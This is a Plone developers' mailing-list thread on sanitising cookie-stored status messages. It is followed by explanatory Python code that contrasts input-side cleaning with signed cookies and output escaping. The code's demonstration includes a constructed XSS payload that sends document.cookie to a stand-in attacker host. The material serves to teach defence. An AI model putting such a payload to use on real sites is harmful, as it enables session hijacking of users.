[Product-Developers] Links in StatusMessages

Richard Mitchell richard.j.mitchell at gmail.com
Fri Aug 24 08:45:31 UTC 2012


Philip: If one relies on the data being cleaned before it is set in the
cookie, it could be manipulated afterwards, or, completely separately, set to
contain something more dangerous.
On Aug 24, 2012 9:09 AM, "Philip Bauer" <bauer at starzel.de> wrote:

> How about cleaning the message before saving it as a cookie?
>
> Would adding something like
> message = portal_transforms.convertTo('text/x-html-safe', self.message,
> mimetype='text/x-web-intelligent')
> to Products.statusmessages.message.Message.encode be ok?
>
> Philip
>
> Am 23.08.2012 um 18:50 schrieb Matthew Wilkes <matt at matthewwilkes.name>:
>
> >
> >
> > Philip Bauer wrote:
> >> I changed this by customizing the template. Might there be a better
> way? Or might it be a good idea to change this template by default?
> >
> > I would be hesitant to change this by default, as it means that if a
> malicious user can get cookies set for another user they can insert
> arbitrary HTML.
> >
> > Matt
>
> _______________________________________________
> Product-Developers mailing list
> Product-Developers at lists.plone.org
> https://lists.plone.org/mailman/listinfo/plone-product-developers
>
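The point Richard is making, worked through as an added example (this is illustration code for the thread, not Products.statusmessages or Plone code; the cookie layout, the `SECRET` value, the helper names and the sample messages are all constructed here). Pattern 1 sanitises when the cookie is set and then trusts the payload at render time; a cookie that never went through the sanitiser, set by anything that can write cookies for the victim, reaches the page unchanged. Pattern 2 keeps the cleaning at the output side, where it cannot be bypassed, and additionally binds the cookie to a server-side secret with an HMAC so forged cookies are dropped before rendering:

```python
"""Where sanitising a cookie-carried status message has to happen.

Constructed example; not Products.statusmessages code.
"""
import base64
import hashlib
import hmac
import html
import json

# Hypothetical per-site secret: generated once, kept server-side,
# never derived from anything the browser sends.
SECRET = b"constructed-example-secret"


def _b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode("ascii")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text.encode("ascii"))


# --- Pattern 1: clean on the way in, trust on the way out -------------------

def encode_cleaned(message: str) -> str:
    """Sanitise when the cookie is set (the approach floated in the thread).

    html.escape stands in for the text/x-html-safe transform."""
    cleaned = html.escape(message, quote=True)
    return _b64e(json.dumps({"message": cleaned}).encode("utf-8"))


def render_trusting(cookie_value: str) -> str:
    """Render the payload unescaped, as a template `structure` expression would."""
    payload = json.loads(_b64d(cookie_value).decode("utf-8"))
    return '<dd class="portalMessage">%s</dd>' % payload["message"]


def forge_cookie(message: str) -> str:
    """What someone who can set the victim's cookie sends: no cleaning at all."""
    return _b64e(json.dumps({"message": message}).encode("utf-8"))


# --- Pattern 2: verify integrity, then escape at render time ----------------

def encode_signed(message: str) -> str:
    """Store the raw message, bound to the site secret with an HMAC tag."""
    body = json.dumps({"message": message}).encode("utf-8")
    tag = hmac.new(SECRET, body, hashlib.sha256).digest()
    return _b64e(body) + "." + _b64e(tag)


def decode_signed(cookie_value: str):
    """Return the stored message, or None if we did not produce this cookie."""
    try:
        body_b64, tag_b64 = cookie_value.split(".", 1)
        body, tag = _b64d(body_b64), _b64d(tag_b64)
    except ValueError:          # missing separator or malformed base64
        return None
    expected = hmac.new(SECRET, body, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):   # constant-time comparison
        return None
    return json.loads(body.decode("utf-8"))["message"]


def render_hardened(cookie_value: str) -> str:
    """Drop forged cookies, and escape even genuine content at output time."""
    message = decode_signed(cookie_value)
    if message is None:
        return ""
    return '<dd class="portalMessage">%s</dd>' % html.escape(message, quote=True)


if __name__ == "__main__":
    # Constructed hostile message.
    evil = '<script>document.location="http://attacker.invalid/"+document.cookie</script>'
    print(render_trusting(encode_cleaned(evil)))   # looks safe for a server-set cookie
    print(render_trusting(forge_cookie(evil)))     # raw <script> reaches the page
    print(repr(render_hardened(forge_cookie(evil))))  # forged cookie rejected
    print(render_hardened(encode_signed(evil)))    # genuine cookie, escaped
```

The signature only tells the server the cookie is one it issued; it does not make the content safe, which is why `render_hardened` still escapes. Escaping at output also covers the case Matthew raised, where the template itself is the thing that decides whether stored HTML is trusted.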

